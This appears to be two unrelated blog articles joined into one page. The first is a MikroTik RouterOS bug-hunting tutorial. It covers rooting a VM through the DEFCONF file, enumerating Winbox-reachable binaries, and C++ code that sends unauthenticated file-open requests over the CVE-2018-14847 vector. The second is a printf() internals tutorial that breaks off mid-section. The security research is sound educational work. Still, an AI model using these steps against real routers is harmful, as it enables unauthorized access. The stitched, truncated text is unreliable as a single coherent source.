Make It Rain with MikroTik

Original text by Jacob Baines

Can you hear me in the… front?

I came into work to find an unusually high number of private Slack messages. They all pointed to the same tweet.

Why would this matter to me? I gave a talk at Derbycon about hunting for bugs in MikroTik’s RouterOS. I had a 9am Sunday time slot.

You don’t want a 9am Sunday time slot at Derbycon

Now that Zerodium is paying out six figures for MikroTik vulnerabilities, I figured it was a good time to finally put some of my RouterOS bug hunting into writing. Really, any time is a good time to investigate RouterOS. It’s a fun target. Hell, just preparing this write up I found a new unauthenticated vulnerability. You could too.


Laying the Groundwork

Now I know you’re already looking up Rolex prices, but calm down, Sparky. You still have work to do. Even if you’re just planning to download a simple fuzzer and pray for a pay day, you’ll still need to read this first section.

Acquiring Software

You don’t have to rush to Amazon to acquire a router. MikroTik makes RouterOS ISOs available on their website. The ISO can be used to create a virtual host with VirtualBox or VMware.

Naturally, Mikrotik published 6.42.12 the day I published this blog

You can also extract the system files from the ISO.

albinolobster@ubuntu:~/6.42.11$ 7z x mikrotik-6.42.11.iso
7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,4 CPUs)
Processing archive: mikrotik-6.42.11.iso
Extracting  advanced-tools-6.42.11.npk
Extracting calea-6.42.11.npk
Extracting defpacks
Extracting dhcp-6.42.11.npk
Extracting dude-6.42.11.npk
Extracting gps-6.42.11.npk
Extracting hotspot-6.42.11.npk
Extracting ipv6-6.42.11.npk
Extracting isolinux
Extracting isolinux/boot.cat
Extracting isolinux/initrd.rgz
Extracting isolinux/isolinux.bin
Extracting isolinux/isolinux.cfg
Extracting isolinux/linux
Extracting isolinux/TRANS.TBL
Extracting kvm-6.42.11.npk
Extracting lcd-6.42.11.npk
Extracting LICENSE.txt
Extracting mpls-6.42.11.npk
Extracting multicast-6.42.11.npk
Extracting ntp-6.42.11.npk
Extracting ppp-6.42.11.npk
Extracting routing-6.42.11.npk
Extracting security-6.42.11.npk
Extracting system-6.42.11.npk
Extracting TRANS.TBL
Extracting ups-6.42.11.npk
Extracting user-manager-6.42.11.npk
Extracting wireless-6.42.11.npk
Extracting [BOOT]/Bootable_NoEmulation.img
Everything is Ok
Folders: 1
Files: 29
Size: 26232176
Compressed: 26335232

MikroTik packages a lot of their software in their custom .npk format. There’s a tool that’ll unpack these, but I prefer to just use binwalk.

albinolobster@ubuntu:~/6.42.11$ binwalk -e system-6.42.11.npk
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------
0 0x0 NPK firmware header, image size: 15616295, image name: "system", description: ""
4096 0x1000 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 9818075 bytes, 1340 inodes, blocksize: 262144 bytes, created: 2018-12-21 09:18:10
9822304 0x95E060 ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)
9842177 0x962E01 Unix path: /sys/devices/system/cpu
9846974 0x9640BE ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)
9904147 0x972013 Unix path: /sys/devices/system/cpu
9928025 0x977D59 Copyright string: "Copyright 1995-2005 Mark Adler "
9928138 0x977DCA CRC32 polynomial table, little endian
9932234 0x978DCA CRC32 polynomial table, big endian
9958962 0x97F632 xz compressed data
12000822 0xB71E36 xz compressed data
12003148 0xB7274C xz compressed data
12104110 0xB8B1AE xz compressed data
13772462 0xD226AE xz compressed data
13790464 0xD26D00 xz compressed data
15613512 0xEE3E48 xz compressed data
15616031 0xEE481F Unix path: /var/pdb/system/crcbin/milo 3801732988
albinolobster@ubuntu:~/6.42.11$ ls -o ./_system-6.42.11.npk.extracted/squashfs-root/
total 64
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 bin
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 boot
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 dev
lrwxrwxrwx 1 albinolobster 11 Dec 21 04:18 dude -> /flash/dude
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:18 etc
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 flash
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:17 home
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 initrd
drwxr-xr-x 4 albinolobster 4096 Dec 21 04:18 lib
drwxr-xr-x 5 albinolobster 4096 Dec 21 04:18 nova
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:18 old
lrwxrwxrwx 1 albinolobster 9 Dec 21 04:18 pckg -> /ram/pckg
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 proc
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 ram
lrwxrwxrwx 1 albinolobster 9 Dec 21 04:18 rw -> /flash/rw
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 sbin
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 sys
lrwxrwxrwx 1 albinolobster 7 Dec 21 04:18 tmp -> /rw/tmp
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:17 usr
drwxr-xr-x 5 albinolobster 4096 Dec 21 04:18 var
albinolobster@ubuntu:~/6.42.11$

Hack the Box

When looking for vulnerabilities it’s helpful to have access to the target’s filesystem. It’s also nice to be able to run tools, like GDB, locally. However, the shell that RouterOS offers isn’t a normal unix shell. It’s just a command line interface for RouterOS commands.

Who am I?!

Fortunately, I have a workaround that will get us root. RouterOS will execute anything stored in the /rw/DEFCONF file due to the way the rc.d script S12defconf is written.

Friends don’t let friends use eval

A normal user has no access to that file, but thanks to the magic of VMs and Live CDs you can create the file and insert any commands you want. The exact process takes too many words to explain. Instead I made a video. The screen recording is five minutes long and it goes from VM installation all the way through root telnet access.

With root telnet access you have full control of the VM. You can upload more tooling, attach to processes, watch logs, etc. You’re now ready to explore the router’s attack surface.


Is Anyone Listening?

You can quickly determine the network reachable attack surface thanks to the ps command.

Looks like the router listens on some well known ports (HTTP, FTP, Telnet, and SSH), but also some lesser known ports. btest on port 2000 is the bandwidth-test server. mproxy on 8291 is the service that WinBox interfaces with. WinBox is an administrative tool that runs on Windows. It shares all the same functionality as the Telnet, SSH, and HTTP interfaces.

Hello, I load .dll straight off the router. Yes, that has been a problem. Why do you ask?

The Real Attack Surface

The ps output makes it appear as if there are only a few binaries to bug hunt in. But nothing could be further from the truth. Both the HTTP server and Winbox speak a custom protocol that I’ll refer to as WinboxMessage (the actual code calls it nv::message). The protocol specifies which binary a message should be routed to. In truth, with all packages installed, there are about 90 different network reachable binaries that use the WinboxMessage protocol.

There’s also an easy way to figure out which binaries I’m referring to. A list can be found in each package’s /nova/etc/loader/*.x3 file. x3 is a custom file format so I wrote a parser. The example output goes on for a while so I snipped it a bit.

albinolobster@ubuntu:~/routeros/parse_x3/build$ ./x3_parse -f ~/6.42.11/_system-6.42.11.npk.extracted/squashfs-root/nova/etc/loader/system.x3 
/nova/bin/log,3
/nova/bin/radius,5
/nova/bin/moduler,6
/nova/bin/user,13
/nova/bin/resolver,14
/nova/bin/mactel,15
/nova/bin/undo,17
/nova/bin/macping,18
/nova/bin/cerm,19
/nova/bin/cerm-worker,75
/nova/bin/net,20
...

The x3 file also contains each binary’s “SYS TO” identifier. This is the identifier that the WinboxMessage protocol uses to determine where a message should be handled.


Me Talk WinboxMessage Pretty One Day

Knowing which binaries you should be able to reach is useful, but actually knowing how to communicate with them is quite a bit more important. In this section, I’ll walk through a couple of examples.

Getting Started

Let’s say I want to talk to /nova/bin/undo. Where do I start? Let’s start with some code. I’ve written a bunch of C++ that will do all of the WinboxMessage protocol formatting and session handling. I’ve also created a skeleton program that you can build off of. main is pretty bare.

std::string ip;
std::string port;
if (!parseCommandLine(p_argc, p_argv, ip, port))
{
    return EXIT_FAILURE;
}

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
    std::cerr << "Failed to connect to the remote host"
              << std::endl;
    return EXIT_FAILURE;
}

return EXIT_SUCCESS;

You can see the Winbox_Session class is responsible for connecting to the router. It’s also responsible for authentication logic as well as sending and receiving messages.

Now, from the output above, you know that /nova/bin/undo has a SYS TO identifier of 17. In order to reach undo, you need to update the code to create a message and set the appropriate SYS TO identifier (the new part is the last two lines).

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
    std::cerr << "Failed to connect to the remote host"
              << std::endl;
    return EXIT_FAILURE;
}

WinboxMessage msg;
msg.set_to(17);

Command and Control

Each message also requires a command. As you’ll see in a little bit, each command will invoke specific functionality. There are some builtin commands (0xfe0000–0xfe0016) used by all handlers and some custom commands that have unique implementations.

Pop /nova/bin/undo into a disassembler and find the nv::Looper::Looper constructor’s only code cross reference.

Follow the offset to the vtable that I’ve labeled undo_handler and you should see the following.

This is the vtable for undo’s WinboxMessage handling. A bunch of the functions directly correspond to the builtin commands I mentioned earlier (e.g. 0xfe0001 is handled by nv::Handler::cmdGetPolicies). You can also see I’ve highlighted the unknown command function. Non-builtin commands get implemented there.

Since the non-builtin commands are usually the most interesting, you’re going to jump into cmdUnknown. You can see it starts with a command based jump table.

It looks like the commands start at 0x80001. Looking through the code a bit, command 0x80002 appears to have a useful string to test against. Let’s see if you can reach the “nothing to redo” code path.

You need to update the skeleton code to request command 0x80002. You’ll also need to add in the send and receive logic. Everything after msg.set_to(17) is new.

WinboxMessage msg;
msg.set_to(17);
msg.set_command(0x80002);
msg.set_request_id(1);
msg.set_reply_expected(true);
winboxSession.send(msg);
std::cout << "req: " << msg.serialize_to_json() << std::endl;

msg.reset();
if (!winboxSession.receive(msg))
{
    std::cerr << "Error receiving a response." << std::endl;
    return EXIT_FAILURE;
}
std::cout << "resp: " << msg.serialize_to_json() << std::endl;

if (msg.has_error())
{
    std::cerr << msg.get_error_string() << std::endl;
    return EXIT_FAILURE;
}

return EXIT_SUCCESS;

After compiling and executing the skeleton you should get the expected, “nothing to redo.”

albinolobster@ubuntu:~/routeros/poc/skeleton/build$ ./skeleton -i 10.0.0.104 -p 8291
req: {bff0005:1,uff0006:1,uff0007:524290,Uff0001:[17]}
resp: {uff0003:2,uff0004:2,uff0006:1,uff0008:16646150,sff0009:'nothing to redo',Uff0001:[],Uff0002:[17]}
nothing to redo
albinolobster@ubuntu:~/routeros/poc/skeleton/build$

There’s Rarely Just One

In the previous example, you looked at the main handler in undo, which was addressable simply as 17. However, the majority of binaries have multiple handlers. In the following example, you’ll examine /nova/bin/mproxy’s handler #2. I like this example because it’s the vector for CVE-2018-14847 and it helps demystify these weird binary blobs:

My exploit for CVE-2018-14847 delivers a root shell. Just sayin’.

Hunting for Handlers

Open /nova/bin/mproxy in IDA and find the nv::Looper::addHandler import. In 6.42.11, there are only two code cross references to addHandler. It’s easy to identify the handler you’re interested in, handler 2, because the handler identifier is pushed onto the stack right before addHandler is called.

If you look up to where nv::Handler* is loaded into edi then you’ll find the offset for the handler’s vtable. This structure should look very familiar:

Again, I’ve highlighted the unknown command function. The unknown command function for this handler supports seven commands:

  1. Opens a file in /var/pckg/ for writing.
  2. Writes to the open file.
  3. Opens a file in /var/pckg/ for reading.
  4. Reads the open file.
  5. Cancels a file transfer.
  6. Creates a directory in /var/pckg/.
  7. Opens a file in /home/web/webfig/ for reading.

Commands 4, 5, and 7 do not require authentication.

Open a File

Let’s try to open a file in /home/web/webfig/ with command 7. This is the command that the FIRST_PAYLOAD in the exploit-db screenshot uses. If you look at the handling of command 7 in the code, you’ll see the first thing it looks for is a string with the id of 1.

The string is the filename you want to open. What file in /home/web/webfig is interesting?

The real answer is that none of them look interesting. But list contains a list of the installed packages and their version numbers.

Let’s translate the open file request into WinboxMessage. Returning to the skeleton program, you’ll want to overwrite the set_to and set_command code. You’ll also want to insert the add_string call. The new portion is marked with comments below.

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
    std::cerr << "Failed to connect to the remote host"
              << std::endl;
    return EXIT_FAILURE;
}

WinboxMessage msg;
msg.set_to(2, 2); // mproxy, second handler
msg.set_command(7);
msg.add_string(1, "list"); // the file to open

msg.set_request_id(1);
msg.set_reply_expected(true);
winboxSession.send(msg);
std::cout << "req: " << msg.serialize_to_json() << std::endl;

msg.reset();
if (!winboxSession.receive(msg))
{
    std::cerr << "Error receiving a response." << std::endl;
    return EXIT_FAILURE;
}
std::cout << "resp: " << msg.serialize_to_json() << std::endl;

When running this code you should see something like this:

albinolobster@ubuntu:~/routeros/poc/skeleton/build$ ./skeleton -i 10.0.0.104 -p 8291
req: {bff0005:1,uff0006:1,uff0007:7,s1:'list',Uff0001:[2,2]}
resp: {u2:1818,ufe0001:3,uff0003:2,uff0006:1,Uff0001:[],Uff0002:[2,2]}
albinolobster@ubuntu:~/routeros/poc/skeleton/build$

You can see the response from the server contains u2:1818. Look familiar?

1818 is the size of the list

As this is running quite long, I’ll leave the exercise of reading the file’s contents up to the reader. This very simple CVE-2018-14847 proof of concept contains all the hints you’ll need.

Conclusion

I’ve shown you how to get the RouterOS software and root a VM. I’ve shown you the attack surface and taught you how to navigate the system binaries. I’ve given you a library to handle Winbox communication and shown you how to use it. If you want to go deeper and nerd out on protocol minutiae then check out my talk. Otherwise, you now know enough to be dangerous.

Good luck and happy hacking!


Tearing apart printf()

( Original text )

If ‘Hello World’ is the first program for C students, then printf() is probably the first function. I’ve had to answer questions about printf() many times over the years, so I’ve finally set aside time for an informal writeup. The common questions fit roughly into two forms:

  • Easy: How does printf mechanically solve the format problem?
  • Complex: How does printf actually display text on my console?

My usual answer?
“Just open up stdio.h and track it down”

This wild goose chase is not only a great learning experience, but also an interesting test for the dedicated beginner. Will they come back with an answer? If so, how detailed is it? What IS a good answer?


printf() in 30 seconds — TL;DR edition

printf’s execution is tailored to your system and generally goes like this:

  1. Your application uses printf()
  2. Your compiler/linker produce a binary. printf is a load-time pointer to your C library
  3. Your C runtime fixes up the format and sends the string to the kernel via a generic write
  4. Your OS mediates the string’s access to its console representation via a device driver
  5. Text appears on your screen

…but you probably already knew all that.

This is the common case for user-space applications running on an off-the-shelf system. (Side-stepping virtual/embedded/distributed/real-mode machines for the moment).

A more complicated answer starts with: It depends — printf mechanics vary across a long list of things: your compiler toolchain, your system architecture (including the operating system), and obviously how you’ve used it in your program. The diagram above is generally correct but precisely useless for any specific situation.

If you’re not impressed, that’s good. Let’s refine it.


printf() in 90 seconds — Interview question edition

  1. You include the <stdio.h> header in your application
  2. You use printf non-trivially in your app.
  3. Your compiler produces object code — printf is recognized, but unresolved
  4. The linker constructs the executable, printf is tagged for run-time resolution
  5. You execute your program. Standard library is mapped in the process address space
  6. A call to printf() jumps to library code
  7. The formatted string is resolved in a temporary buffer
  8. Standard library writes to the stdout buffered stream. Eventual kernel write entry
  9. Kernel calls a driver write operation for the associated console
  10. Console output buffer is updated with the new string
  11. Output text appears on your console

Sounds better? There’s still a lot missing, including any mention of system specifics. More things to think about (in no particular order):

  • Are we using static or dynamic linkage? Normally printf is run-time linked, but there are exceptions.
  • What OS is this? The differences between them are drastic — When/how is stdout managed? What is the console and how is it updated? What is the kernel entry/syscall procedure…
  • Closely related to the OS…what kind of executable is this? If ELF, we need to talk about the GOT / PLT. If PE (Windows), then we need an import directory.
  • What kind of terminal are you using? Standard laptop/desktop? University cluster over ssh? Is this a virtual machine?
  • This list could go on forever, and all answers affect what really happens behind the scenes.

Things to know before continuing

The next part is targeted for C beginners who want to explore how functions execute through a complex system. I’m keeping the discussion at a high-level so we can focus on how many parts of the problem contribute to a whole solution. I’ll provide references to source code and technical documents so readers can explore on their own. No blog substitutes for authoritative documentation.

Now for a more important question:
Why do beginners get stuck searching for a detailed answer about basic functions like printf()?

I’ll boil it down to three problems:

Not understanding the distinct roles of the compiler, standard library, operating system, and hardware. You can’t look at just one aspect of a system and expect to understand how a function like printf() works. Each component handles a part of the ‘printf’ problem and passes the work to the next using common interfaces along the way. C compilers try to adhere to the ISO C standards. Operating systems may also follow standards such as POSIX/SUS. Standardization streamlines interoperability and portability, but with the cost of code complexity. Beginners often struggle following the chain of code, especially when the standard requirements end and the ‘actual work’ begins between the interfaces. The common complaint: Too many seemingly useless function calls between the interface and the work. This is the price of interoperability and there’s no easy + maintainable + scalable way around it!

Not grasping [compile/link/load/run]-time dynamics. Manual static analysis has limits, and so following any function through the standard library source code inevitably leads to a dead end — an unresolved jump table, an opaque macro with multiple expansions, or a hard stop at the end: an ambiguous function pointer. In printf’s case, that would be *write, which the operating system promises will exist at run-time. Modern compilers and OSs are designed to be multi-platform, and thus every possible code path that could exist is visible prior to compilation. Beginners may get lost in a code base where much of the source ‘compiles away’ and functions resolve dynamically at execution. Trivial case: If you call printf() on a basic string without formats, your compiler may emit a call to ‘puts’, discarding your printf entirely!

Not enough exposure to common abstractions used in complex software systems. Tracing any function through the compiler and OS means working through many disparate ideas in computing. For instance, many I/O operations involve the idea of a character stream. Buffering character I/O with streams has been part of Unix System V since the early 1980s, thanks in part to Dennis Ritchie, co-author of ‘The C Programming Language’. Since the 1990s, multiprocessing has become the norm. Tracing printf means stepping around locks, mutexes, semaphores, and other synchronization tools. More recently, i18n has upped the ante for simple console output. All these concepts taken together often distract and overwhelm beginners who are simply trying to understand one core problem.

Bottom line: Compilers, libraries, operating systems, and hardware are complex; we need to understand how each works together as a system in order to truly understand how printf() works.


printf() in 1000 seconds — TMI edition

(or ‘Too-specific-to-apply-to-any-system-except-mine-on-the-day-I-wrote-this edition’)

The best way to answer these questions is to work through the details on an actual system.

$uname -a
Linux localhost.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

$gcc --version
gcc (GCC) 4.8.5 20150623 (Red Hat 4.8.5-16)
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

$ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.



Step 0 — What is printf?

printf() is an idea that the folks at Bell Labs believed in as early as 1972: A programmer should be able to produce output using various formats without understanding exactly what’s going on under the hood.

This idea is merely an interface.

The programmer calls printf and the system will handle the rest. That is why you’re presumably reading this article — hiding implementation details works!

Early compilers supported programmers exclusively through built-in functions. When toolchains became a business in the early 1980s (Manx/Aztec C, Lattice C), many provided C and ASM source code for common functions that developers could #include in their projects as needed. This allowed customization of built-ins at the application level — no more rebuilding your toolchain for each project. However, programmers were still at the mercy of various brands of compilers, each bringing their own vision of how to implement these functions and run-time.

Thankfully, most of this hassle has gone away today. So if you want to use printf…


Step 1 — Include the <stdio.h> header

Goal: Tap into the infinite power of the C standard library

The simple line of code #include <stdio.h> is possible across the vast majority of computer systems thanks to standards. Specifically, ISO-9899.

In 1978, Brian Kernighan and Dennis Ritchie described printf in its full variadic form to include nine types of formats:

printf(control, arg1, arg2, ...);    # K&R (1st ed.)

This was as close as the industry would get to a standard for the next decade. Between 1983 and 1989, the ANSI committee worked on the formal standard that eventually brought the printf interface to its familiar form:

int printf(const char *format, ...);   # ANSI C (1989)

Here’s an oft-forgotten bit of C trivia: printf returns a value (the actual character output count). The interface from 1978 didn’t mention a return value, but the implied return type is integer under K&R rules. The earliest known compiler (linked above) did not return any value.
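To see that return value for yourself, here is a tiny standalone example of mine (not from the article):

#include <stdio.h>

int main(void)
{
  int n = printf("Hello World\n");   /* returns the number of characters written */
  printf("printf returned %d\n", n); /* 12: the 11 characters of "Hello World" plus the newline */
  return 0;
}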

The most recent C standard from 2011 shows that the interface changed by only one keyword in the intervening 20 years:

int printf(const char * restrict format, ...);  # Latest ISO C (2011)

‘restrict’ (a C99 feature) allows the compiler to optimize without concern for pointer aliasing.

Over the past 40 years, the interface for printf is mostly unchanged, thus highly backwards compatible. However, the feature set has grown quite a bit:

1972              1978                   1989                  2011
%d — decimal      Top 3 from ’72         All from ’78 plus…    Too many!
%o — octal        %x — hexadecimal       %i — signed int       Read
%s — string       %u — unsigned decimal  %p — void pointer     the
%p — string ptr   %c — byte/character    %n — output count     manual,
                  %e,f,g — floats/dbl    %% — complete form    pp. 309-315

Step 2 — Use printf() with formats

Goal: Make sure your call to printf actually uses printf()

We’ll test out printf() with two small plagiarized programs. However, only one of them is truly a candidate for tracing printf().

Trivial printf() — printf0.c:

$ cat printf0.c
#include <stdio.h>

int main(int argc, char **argv)
{
  printf("Hello World\n");
  return 0;
}

Better printf() — printf1.c:

$ cat printf1.c
#include <stdio.h>

int main(int argc, char **argv)
{
  printf("Hello World %d\n",1);
  return 0;
}

The difference is that printf0.c does not actually contain any formats, thus there is no reason to use printf. Your compiler won’t bother to use it. In fact, you can’t even disable this ‘optimization’ using GCC -O0 because the substitution (fold) happens during semantic analysis (GCC lingo: Gimplification), not during optimization. To see this in action, we must compile!

Possible trap: Some compilers may recognize the ‘1’ literal used in printf1.c, fold it into the string, and avoid printf() in both cases. If that happens to you, substitute an expression that must be evaluated, as in the sketch below.
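For example, a minimal variant of printf1.c (my own sketch) that uses argc, a value the compiler cannot know at compile time:

#include <stdio.h>

int main(int argc, char **argv)
{
  /* argc is only known at run time, so the format cannot be folded away */
  printf("Hello World %d\n", argc);
  return 0;
}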


Step 3 — Compiler produces object code

Goal: Organize the components (symbols) of your application

Compiling programs results in an object file, which contains records of every symbol in the source file. Each .c file compiles to a .o file, but neither file has seen any other file yet (no linking yet). Let’s look at the symbols in both of the programs from the last step.

Trivial printf():

$ gcc printf0.c -c -o printf0.o
$ nm printf0.o
0000000000000000 T main
                 U puts

More useful printf():

$ gcc printf1.c -c -o printf1.o
$ nm printf1.o
0000000000000000 T main
                 U printf

As expected, the trivial printf usage has a symbol for a simpler function, puts. The file that included a format instead has a symbol for printf. In both cases, the symbol is undefined. The compiler doesn’t know where puts() or printf() are defined, but it knows that they exist thanks to stdio.h. It’s up to the linker to resolve the symbols.


Step 4 — Linking brings it all together

Goal: Build a binary that includes all code in one package

Let’s compile and link both files again, this time both statically and dynamically.

$ gcc printf0.c -o printf0            # Trivial printf dynamic linking
$ gcc printf1.c -o printf1            # Better printf dynamic linking
$ gcc printf0.c -o printf0_s -static  # Trivial printf static linking
$ gcc printf1.c -o printf1_s -static  # Better printf static linking

Possible trap: You need to have the static standard library available to statically link (libc.a). Most systems already have the shared library built-in (libc.so). Windows users will need a libc.lib and maybe a libmsvcrt.lib. I haven’t tested in an MS environment in a while.

Static linking pulls all the standard library object code into the executable. The benefit for us is that all of the code executed in user space is now self-contained in this single file and we can easily trace the standard library functions. In real life, you rarely want to do this. The disadvantages are just too great, especially for maintainability. Here’s an obvious disadvantage:

$ ls -l printf1*
total 1696
-rwxrwxr-x. 1 maiz maiz   8520 Mar 31 13:38 printf1     # Dynamic
-rw-rw-r--. 1 maiz maiz    101 Mar 31 12:57 printf1.c
-rw-rw-r--. 1 maiz maiz   1520 Mar 31 13:37 printf1.o
-rwxrwxr-x. 1 maiz maiz 844000 Mar 31 13:40 printf1_s   # Static

Our test binary blew up from 8kb to 844kb. Let’s take a look at the symbol count in each:

$ nm printf1.o | wc -l
2                      # Object file symbol count (main, printf)
$ nm printf1 | wc -l
34                     # Dynamic-linked binary symbol count
$ nm printf1_s | wc -l
1873                   # Static-linked binary symbol count

Our original, unlinked object file had just the two symbols we already saw (main and printf). The dynamic-linked binary has 34 symbols, most of which correspond to the C runtime, which sets up the environment. Finally, our static-linked binary has nearly 2000 symbols, which include everything that could be used from the standard library.

As you may know, this has a significant impact on load-time and run-time


Step 5 — Loader prepares the run-time

Goal: Set up the execution environment

The dynamic-linked binary has more work to do than its static brother. The static version included 1873 symbols, but the dynamic binary shipped with only 34. It needs to find the code in shared libraries and memory map it into the process address space. We can watch this in action by using strace.

Dynamic-linked printf() syscall trace

$ strace ./printf1
execve("./printf1", ["./printf1"], [/* 47 vars */]) = 0
brk(NULL) = 0x1dde000
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce82000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=83694, ...}) = 0
mmap(NULL, 83694, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f59bce6d000
close(3) = 0
open("/lib64/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2127336, ...}) = 0
mmap(NULL, 3940800, ..., 3, 0) = 0x7f59bc89f000
mprotect(0x7f59bca57000, 2097152, PROT_NONE) = 0
mmap(0x7f59bcc57000, 24576, ..., 3, 0x1b8000) = 0x7f59bcc57000
mmap(0x7f59bcc5d000, 16832, ..., -1, 0) = 0x7f59bcc5d000
close(3) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce6c000
mmap(NULL, 8192, ..., -1, 0) = 0x7f59bce6a000
arch_prctl(ARCH_SET_FS, 0x7f59bce6a740) = 0
mprotect(0x7f59bcc57000, 16384, PROT_READ) = 0
mprotect(0x600000, 4096, PROT_READ) = 0
mprotect(0x7f59bce83000, 4096, PROT_READ) = 0
munmap(0x7f59bce6d000, 83694) = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce81000
write(1, "Hello World 1\n", 14Hello World 1) = 14
exit_group(0) = ?
+++ exited with 0 +++

Each line is a syscall. The first is just after bash clones into printf1, and the write syscall is near the bottom. The 21 syscalls between brk and the final fstat are devoted to loading shared libraries. This is the load-time penalty for dynamic linking. Don’t worry if this seems like a mess, we won’t be using it. If you’re interested in more detail, here is the full dump with walkthrough.

Now let’s look at the memory map for the process

Dynamic-linked printf() memory map

$ cat /proc/3177/maps
00400000-00401000 r-xp 00000000         ./printf1
00600000-00601000 r--p 00000000         ./printf1
00601000-00602000 rw-p 00001000         ./printf1
7f59bc89f000-7f59bca57000 r-xp 00000000 /usr/lib64/libc-2.17.so
7f59bca57000-7f59bcc57000 ---p 001b8000 /usr/lib64/libc-2.17.so
7f59bcc57000-7f59bcc5b000 r--p 001b8000 /usr/lib64/libc-2.17.so
7f59bcc5b000-7f59bcc5d000 rw-p 001bc000 /usr/lib64/libc-2.17.so
7f59bcc5d000-7f59bcc62000 rw-p 00000000  
7f59bcc62000-7f59bcc83000 r-xp 00000000 /usr/lib64/ld-2.17.so
7f59bce6a000-7f59bce6d000 rw-p 00000000  
7f59bce81000-7f59bce83000 rw-p 00000000  
7f59bce83000-7f59bce84000 r--p 00021000 /usr/lib64/ld-2.17.so
7f59bce84000-7f59bce85000 rw-p 00022000 /usr/lib64/ld-2.17.so
7f59bce85000-7f59bce86000 rw-p 00000000  
7fff89031000-7fff89052000 rw-p 00000000 [stack]
7fff8914e000-7fff89150000 r-xp 00000000 [vdso]
ffffffffff600000-ffffffffff601000 r-xp  [vsyscall]

Our 8kb binary fits into three 4kb memory pages (top three lines). The standard library has been mapped roughly into the middle of the address space. Code execution begins in the code area at the top and jumps into the shared library as needed.

That’s the last time I’ll mention the dynamic-linked version. We’ll use the static version from now on since it’s easier to trace.

Static-linked printf() syscall trace

$ strace ./printf1_s
execve("./printf1_s", ["./printf1_s"],[/*47 vars*/]) = 0
uname({sysname="Linux", nodename="...", ...}) = 0
brk(NULL) = 0x1d4a000
brk(0x1d4b1c0) = 0x1d4b1c0
arch_prctl(ARCH_SET_FS, 0x1d4a880) = 0
brk(0x1d6c1c0) = 0x1d6c1c0
brk(0x1d6d000) = 0x1d6d000
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7faad3151000
write(1, "Hello World 1\n", 14Hello World 1) = 14
exit_group(0) = ?
+++ exited with 0 +++

The static-linked binary uses far fewer syscalls. I’ve highlighted three of them near the bottom: fstat, mmap, and write. These occur during printf(). We’ll trace this better in the next step. First, let’s look at the static memory map:

Static-linked printf() memory map

$ cat /proc/3237/maps
00400000-004b8000 r-xp 00000000         ./printf1_s
006b7000-006ba000 rw-p 000b7000         ./printf1_s
006ba000-006df000 rw-p 00000000         [heap]
7ffff7ffc000-7ffff7ffd000 rw-p 00000000 
7ffff7ffd000-7ffff7fff000 r-xp 00000000 [vdso]
7ffffffde000-7ffffffff000 rw-p 00000000 [stack]
ffffffffff600000-ffffffffff601000 r-xp  [vsyscall]

No hint of a shared library. That’s because all the code is now included on the first two lines within the printf1_s binary. The static binary is using 187 pages of memory, just short of 800kb. This follows what we know about the large binary size.

Now we’ll move on to the more interesting part: execution.


Step 6 — printf call jumps to the standard library

Goal: Follow the standard library call sequence at run-time

The programmer shapes code for the printf interface then the run-time library bridges the standard API and the OS interface.

Key point: A compiler/library is free to handle logic any way it wants between interfaces. After printf is called, there is no standard-defined procedure required, except that the correct output is produced within certain boundaries. There are many possible paths to the output, and every toolchain handles it differently. In general, this work is done in two parts: a platform-independent side, where a call to printf solves the format substitution problem (Steps 6 and 7), and a platform-dependent side, which calls into the OS kernel using the properly formatted string (Step 8).

The next three steps will focus solely on the static-linked version of printf. It’s less tedious to trace static-linked source, especially through the kernel in the next few steps. Note that the number of instructions executed is ~2300 for the dynamic version and ~1600 for the static version.

In addition to printf, compliant C compilers also implement:

fprintf() — A generalized version of printf except the output can go to any file stream, not just the console. fprintf is notable because the C standard defines the supported format types in its description. fprintf() isn’t used here, but it’s good to know about since it’s related to the next function.

vfprintf() — Similar to fprintf except the variadic arguments are reduced to a single pointer to a va_list. libc does almost all printing work in this function, including format replacement. (f)printf merely calls vfprintf almost immediately. vfprintf then uses the libio interface to write final strings to streams.
